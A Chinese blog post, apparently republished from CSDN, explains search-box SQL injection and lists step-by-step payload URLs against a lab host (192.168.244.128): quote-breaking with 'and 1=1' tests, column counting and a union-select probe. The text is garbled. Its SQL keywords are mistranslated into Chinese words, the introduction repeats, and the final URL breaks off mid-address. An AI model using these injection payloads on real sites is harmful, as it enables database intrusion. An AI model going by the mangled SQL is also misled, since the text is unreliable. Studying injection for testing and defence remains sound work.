【漏洞挖掘】——101、搜索型注入深入刨析,搜索1104

【漏洞挖掘】——101、搜索型注入深入刨析基本介绍
网站为了用户便于搜索网站中的资源往往会加入搜索功能,如果底层的代码忽略了对搜索变量的过滤,则有可能会造成了搜索型注入漏洞(又称文本框注入),对于常见的搜索框而言,后台常用的SQL语句如下

基本介绍

网站通常包含搜索功能,以帮助用户轻松查找网站上的资源。如果底层代码忽略搜索变量过滤,则通用搜索框可能存在搜索注入漏洞。常用的后台SQL语句有:如果这里的参数不经过过滤器直接加入到SQL语句中,注入方式与字符注入类似,但是这里需要进行如下操作:结束匹配为“%”。其余基本相同

从用户名如“%input%”的成员中选择*

注入流程

确定注入

http://192.168.244.128/sql_search.php?content=#普通页面

http://192.168.244.128/sql_search.php?content=%\’ and 1=1 # #普通页面

http://192.168.244.128/sql_search.php?content=%\’ and 1=2 # #显示异常

猜解字段

http://192.168.244.128/sql_search.php?content=%\’ 3 命令# #正常显示

http://192.168.244.128/sql_search.php?content=%\’ 4命令# #显示错误

确定回显位

http://192.168.244.128/sql_search.php?content=-1%\’ 连接选择1,2,3 #

查询库用户名

http://192.168.244

以上相关内容来源网络对#[漏洞挖掘]——101进行详细分析和搜索注入,仅供参考。相关信息请参见官方公告。

原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/91267.html

(0)
CSDN的头像CSDN
上一篇 2024年6月21日
下一篇 2024年6月21日

相关推荐

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注